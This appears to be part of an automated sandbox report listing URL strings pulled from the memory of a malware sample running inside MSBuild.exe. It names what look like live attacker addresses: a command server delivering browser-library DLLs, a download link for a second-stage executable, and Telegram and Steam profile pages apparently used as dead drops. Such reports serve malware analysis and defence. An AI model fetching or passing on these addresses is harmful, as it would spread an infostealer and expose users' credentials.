Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.000000000137A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/
Source: MSBuild.exe, 00000001.00000002.2227078403.000000000137A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/J
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/freebl3.dll
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/freebl3.dlls$
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/mozglue.dll
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/mozglue.dllP$W
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/msvcp140.dll
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/msvcp140.dll~$M
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/nss3.dll
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/softokn3.dll
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/sql.dll
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/vcruntime140.dll
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com/vcruntime140.dllK
Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com:80
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004C0000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com:80/sql.dll
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://kasm.zubairgul.com:80ontent-Disposition:
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe1kkkk
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exeq
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.4.dr String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2239039820.000000002024D000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: HJEHIJ.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.000000000137A000.00000004.00000020.00020000.00000000.sdmp, KJDGDB.1.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.000000000137A000.00000004.00000020.00020000.00000000.sdmp, KJDGDB.1.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: HJEHIJ.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HJEHIJ.1.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HJEHIJ.1.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.000000000137A000.00000004.00000020.00020000.00000000.sdmp, KJDGDB.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.000000000137A000.00000004.00000020.00020000.00000000.sdmp, KJDGDB.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HJEHIJ.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HJEHIJ.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HJEHIJ.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: KJDGDB.1.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2216781239.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2217014896.0000000000B35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/C(l2
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: MSBuild.exe, 00000009.00000002.2216781239.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2217014896.0000000000B35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: T2bmenoX1o.exe, T2bmenoX1o.exe, 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: T2bmenoX1o.exe, 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: MSBuild.exe, 00000009.00000002.2217014896.0000000000B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: HDAKJD.1.dr String found in binary or memory: https://support.mozilla.org
Source: HDAKJD.1.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDAKJD.1.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: MSBuild.exe, 00000001.00000002.2230838575.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp, IJKJDA.1.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: IJKJDA.1.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: MSBuild.exe, 00000001.00000002.2230838575.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp, IJKJDA.1.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: IJKJDA.1.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: T2bmenoX1o.exe, T2bmenoX1o.exe, 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/lpnjoke
Source: T2bmenoX1o.exe, 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/maslengdsa
Source: T2bmenoX1o.exe, 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/maslengdsafdmskfj3efskoahttps://steamcommunity.com/profiles/76561199786602107g0b4cMozil
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.000000000137A000.00000004.00000020.00020000.00000000.sdmp, KJDGDB.1.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: HJEHIJ.1.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.000000000137A000.00000004.00000020.00020000.00000000.sdmp, KJDGDB.1.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: HJEHIJ.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: HDAKJD.1.dr String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000001.00000002.2230838575.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: HDAKJD.1.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000001.00000002.2230838575.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: HDAKJD.1.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: MSBuild.exe, 00000001.00000002.2230838575.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HDAKJD.1.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
